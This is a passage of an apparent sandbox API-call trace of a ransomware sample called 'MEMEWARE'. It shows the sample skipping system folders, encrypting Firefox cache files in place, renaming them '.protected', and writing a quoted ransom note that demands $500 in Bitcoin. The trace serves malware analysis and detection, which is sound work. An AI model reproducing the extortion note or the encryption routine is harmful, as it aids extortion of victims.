lpOverlapped=0x0) returned 1 [0086.394] CloseHandle (hObject=0x160) returned 1 [0086.394] wnsprintfW (in: pszDest=0xcf0090, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\F\\F0\\ECB2Dd01.protected") returned 119 [0086.395] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\F\\F0\\ECB2Dd01" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\cache\\f\\f0\\ecb2dd01"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\F\\F0\\ECB2Dd01.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\cache\\f\\f0\\ecb2dd01.protected")) returned 1 [0086.395] FindNextFileW (in: hFindFile=0x47bb90, lpFindFileData=0x295de10 | out: lpFindFileData=0x295de10) returned 0 [0086.395] FindClose (in: hFindFile=0x47bb90 | out: hFindFile=0x47bb90) returned 1 [0086.395] wnsprintfW (in: pszDest=0xce0048, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\F\\F0\\RESTORE_FILES.txt") returned 118 [0086.395] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\F\\F0\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\cache\\f\\f0\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x15c [0086.396] lstrlenA (lpString="! 
SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0086.396] WriteFile (in: hFile=0x15c, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295ddf4*=0x53d, lpOverlapped=0x0) returned 1 [0086.397] lstrlenA (lpString="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") returned 684 [0086.397] WriteFile (in: hFile=0x15c, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295ddf4*=0x2ac, lpOverlapped=0x0) returned 1 
[0086.397] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0086.397] WriteFile (in: hFile=0x15c, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295ddf4*=0xb1, lpOverlapped=0x0) returned 1 [0086.397] CloseHandle (hObject=0x15c) returned 1 [0086.397] FindNextFileW (in: hFindFile=0x47bb50, lpFindFileData=0x295e080 | out: lpFindFileData=0x295e080) returned 0 [0086.397] FindClose (in: hFindFile=0x47bb50 | out: hFindFile=0x47bb50) returned 1 [0086.397] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\F\\RESTORE_FILES.txt") returned 115 [0086.397] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\F\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\cache\\f\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0086.397] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. 
\r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0086.397] WriteFile (in: hFile=0x158, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295e064, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295e064*=0x53d, lpOverlapped=0x0) returned 1 [0086.398] lstrlenA (lpString="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") returned 684 [0086.398] WriteFile (in: hFile=0x158, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295e064, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295e064*=0x2ac, lpOverlapped=0x0) returned 1 [0086.398] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0086.398] WriteFile (in: hFile=0x158, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295e064, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295e064*=0xb1, 
lpOverlapped=0x0) returned 1 [0086.398] CloseHandle (hObject=0x158) returned 1 [0086.399] FindNextFileW (in: hFindFile=0x47bb10, lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 1 [0086.399] lstrcmpiW (lpString1="_CACHE_001_", lpString2="Windows") returned -1 [0086.399] lstrcmpiW (lpString1="_CACHE_001_", lpString2="Program Files") returned -1 [0086.399] lstrcmpiW (lpString1="_CACHE_001_", lpString2="Program Files (x86)") returned -1 [0086.399] lstrcmpiW (lpString1="_CACHE_001_", lpString2="$Recycle.bin") returned 1 [0086.399] lstrcmpiW (lpString1="_CACHE_001_", lpString2="System Volume Information") returned -1 [0086.399] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\_CACHE_001_") returned 107 [0086.399] StrStrIW (lpFirst="_CACHE_001_", lpSrch=".protected") returned 0x0 [0086.399] lstrcmpW (lpString1="_CACHE_001_", lpString2="RESTORE_FILES.txt") returned -1 [0086.399] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e28c | out: pbBuffer=0x295e28c) returned 1 [0086.400] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e2b4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e2b4*=0x30) returned 1 [0086.400] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\_CACHE_001_" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\cache\\_cache_001_"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0086.400] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\_CACHE_001_") returned 107 [0086.400] StrStrW 
(lpFirst="_CACHE_001_", lpSrch=".txt") returned 0x0 [0086.400] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\_CACHE_001_") returned 107 [0086.400] StrStrW (lpFirst="_CACHE_001_", lpSrch=".rar") returned 0x0 [0086.400] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\_CACHE_001_") returned 107 [0086.400] StrStrW (lpFirst="_CACHE_001_", lpSrch=".zip") returned 0x0 [0086.400] ReadFile (in: hFile=0x158, lpBuffer=0x4a2460, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x4a2460*, lpNumberOfBytesRead=0x295e2d4*=0x2800, lpOverlapped=0x0) returned 1 [0086.410] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0086.410] WriteFile (in: hFile=0x158, lpBuffer=0x4a2460*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x4a2460*, lpNumberOfBytesWritten=0x295e2d4*=0x2800, lpOverlapped=0x0) returned 1 [0086.411] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0086.411] WriteFile (in: hFile=0x158, lpBuffer=0x295e2ac*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x295e2ac*, lpNumberOfBytesWritten=0x295e2d4*=0x4, lpOverlapped=0x0) returned 1 [0086.441] WriteFile (in: hFile=0x158, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e2d4*=0x30, lpOverlapped=0x0) returned 1 [0086.441] CloseHandle (hObject=0x158) returned 1 [0086.442] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\_CACHE_001_.protected") returned 117 [0086.442] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\_CACHE_001_" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\cache\\_cache_001_"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\_CACHE_001_.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\cache\\_cache_001_.protected")) returned 1 [0086.443] FindNextFileW (in: hFindFile=0x47bb10, lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 1 [0086.443] lstrcmpiW (lpString1="_CACHE_002_", lpString2="Windows") returned -1 [0086.443] lstrcmpiW (lpString1="_CACHE_002_", lpString2="Program Files") returned -1 [0086.443] lstrcmpiW (lpString1="_CACHE_002_", lpString2="Program Files (x86)") returned -1 [0086.443] lstrcmpiW (lpString1="_CACHE_002_", lpString2="$Recycle.bin") returned 1 [0086.443] lstrcmpiW (lpString1="_CACHE_002_", lpString2="System Volume Information") returned -1 [0086.443] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\_CACHE_002_") returned 107 [0086.443] StrStrIW (lpFirst="_CACHE_002_", lpSrch=".protected") returned 0x0 [0086.443] lstrcmpW (lpString1="_CACHE_002_", lpString2="RESTORE_FILES.txt") returned -1 [0086.443] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e28c | out: pbBuffer=0x295e28c) returned 1 [0086.443] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e2b4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e2b4*=0x30) returned 1 [0086.443] 
CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\_CACHE_002_" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\cache\\_cache_002_"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0086.444] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\_CACHE_002_") returned 107 [0086.444] StrStrW (lpFirst="_CACHE_002_", lpSrch=".txt") returned 0x0 [0086.445] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\_CACHE_002_") returned 107 [0086.445] StrStrW (lpFirst="_CACHE_002_", lpSrch=".rar") returned 0x0 [0086.445] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\_CACHE_002_") returned 107 [0086.445] StrStrW (lpFirst="_CACHE_002_", lpSrch=".zip") returned 0x0 [0086.445] ReadFile (in: hFile=0x158, lpBuffer=0x4a2460, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x4a2460*, lpNumberOfBytesRead=0x295e2d4*=0x2800, lpOverlapped=0x0) returned 1 [0086.446] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0086.446] WriteFile (in: hFile=0x158, lpBuffer=0x4a2460*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x4a2460*, lpNumberOfBytesWritten=0x295e2d4*=0x2800, lpOverlapped=0x0) returned 1 [0086.447] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0086.447] WriteFile (in: hFile=0x158, lpBuffer=0x295e2ac*, 
nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x295e2ac*, lpNumberOfBytesWritten=0x295e2d4*=0x4, lpOverlapped=0x0) returned 1 [0086.474] WriteFile (in: hFile=0x158, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e2d4*=0x30, lpOverlapped=0x0) returned 1 [0086.474] CloseHandle (hObject=0x158) returned 1 [0086.474] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\_CACHE_002_.protected") returned 117 [0086.474] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\_CACHE_002_" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\cache\\_cache_002_"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\_CACHE_002_.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\cache\\_cache_002_.protected")) returned 1 [0086.475] FindNextFileW (in: hFindFile=0x47bb10, lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 1 [0086.475] lstrcmpiW (lpString1="_CACHE_003_", lpString2="Windows") returned -1 [0086.475] lstrcmpiW (lpString1="_CACHE_003_", lpString2="Program Files") returned -1 [0086.475] lstrcmpiW (lpString1="_CACHE_003_", lpString2="Program Files (x86)") returned -1 [0086.475] lstrcmpiW (lpString1="_CACHE_003_", lpString2="$Recycle.bin") returned 1 [0086.475] lstrcmpiW (lpString1="_CACHE_003_", lpString2="System Volume Information") returned -1 [0086.475] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\_CACHE_003_") returned 107 [0086.475] StrStrIW (lpFirst="_CACHE_003_", lpSrch=".protected") returned 0x0 [0086.475] lstrcmpW (lpString1="_CACHE_003_", lpString2="RESTORE_FILES.txt") returned -1 [0086.475] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e28c | out: pbBuffer=0x295e28c) returned 1 [0086.475] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e2b4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e2b4*=0x30) returned 1 [0086.475] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\_CACHE_003_" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\cache\\_cache_003_"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0086.477] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\_CACHE_003_") returned 107 [0086.477] StrStrW (lpFirst="_CACHE_003_", lpSrch=".txt") returned 0x0 [0086.477] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\_CACHE_003_") returned 107 [0086.477] StrStrW (lpFirst="_CACHE_003_", lpSrch=".rar") returned 0x0 [0086.477] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\_CACHE_003_") returned 107 [0086.477] StrStrW (lpFirst="_CACHE_003_", lpSrch=".zip") returned 0x0 [0086.477] ReadFile (in: hFile=0x158, lpBuffer=0x4a2460, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x4a2460*, lpNumberOfBytesRead=0x295e2d4*=0x2800, lpOverlapped=0x0) returned 1 [0086.479] 
SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0086.479] WriteFile (in: hFile=0x158, lpBuffer=0x4a2460*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x4a2460*, lpNumberOfBytesWritten=0x295e2d4*=0x2800, lpOverlapped=0x0) returned 1 [0086.479] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0086.479] WriteFile (in: hFile=0x158, lpBuffer=0x295e2ac*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x295e2ac*, lpNumberOfBytesWritten=0x295e2d4*=0x4, lpOverlapped=0x0) returned 1 [0086.502] WriteFile (in: hFile=0x158, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e2d4*=0x30, lpOverlapped=0x0) returned 1 [0086.502] CloseHandle (hObject=0x158) returned 1 [0086.502] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\_CACHE_003_.protected") returned 117 [0086.502] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\_CACHE_003_" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\cache\\_cache_003_"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\_CACHE_003_.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\cache\\_cache_003_.protected")) returned 1 [0086.503] FindNextFileW (in: hFindFile=0x47bb10, lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) 
returned 1 [0086.503] lstrcmpiW (lpString1="_CACHE_MAP_", lpString2="Windows") returned -1 [0086.503] lstrcmpiW (lpString1="_CACHE_MAP_", lpString2="Program Files") returned -1 [0086.503] lstrcmpiW (lpString1="_CACHE_MAP_", lpString2="Program Files (x86)") returned -1 [0086.503] lstrcmpiW (lpString1="_CACHE_MAP_", lpString2="$Recycle.bin") returned 1 [0086.503] lstrcmpiW (lpString1="_CACHE_MAP_", lpString2="System Volume Information") returned -1 [0086.503] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\_CACHE_MAP_") returned 107 [0086.503] StrStrIW (lpFirst="_CACHE_MAP_", lpSrch=".protected") returned 0x0 [0086.503] lstrcmpW (lpString1="_CACHE_MAP_", lpString2="RESTORE_FILES.txt") returned -1 [0086.503] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e28c | out: pbBuffer=0x295e28c) returned 1 [0086.503] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e2b4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e2b4*=0x30) returned 1 [0086.503] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\_CACHE_MAP_" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\cache\\_cache_map_"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0086.505] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\_CACHE_MAP_") returned 107 [0086.505] StrStrW (lpFirst="_CACHE_MAP_", lpSrch=".txt") returned 0x0 [0086.505] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\_CACHE_MAP_") returned 107 [0086.505] StrStrW (lpFirst="_CACHE_MAP_", lpSrch=".rar") returned 0x0 [0086.505] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\_CACHE_MAP_") returned 107 [0086.505] StrStrW (lpFirst="_CACHE_MAP_", lpSrch=".zip") returned 0x0 [0086.505] ReadFile (in: hFile=0x158, lpBuffer=0x4a2460, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x4a2460*, lpNumberOfBytesRead=0x295e2d4*=0x2114, lpOverlapped=0x0) returned 1 [0086.516] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffdeec, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0086.517] WriteFile (in: hFile=0x158, lpBuffer=0x4a2460*, nNumberOfBytesToWrite=0x2114, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x4a2460*, lpNumberOfBytesWritten=0x295e2d4*=0x2114, lpOverlapped=0x0) returned 1 [0086.517] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0086.517] WriteFile (in: hFile=0x158, lpBuffer=0x295e2ac*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x295e2ac*, lpNumberOfBytesWritten=0x295e2d4*=0x4, lpOverlapped=0x0) returned 1 [0086.517] WriteFile (in: hFile=0x158, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e2d4*=0x30, lpOverlapped=0x0) returned 1 [0086.517] CloseHandle (hObject=0x158) returned 1 [0086.517] wnsprintfW (in: pszDest=0x4dfbb0, 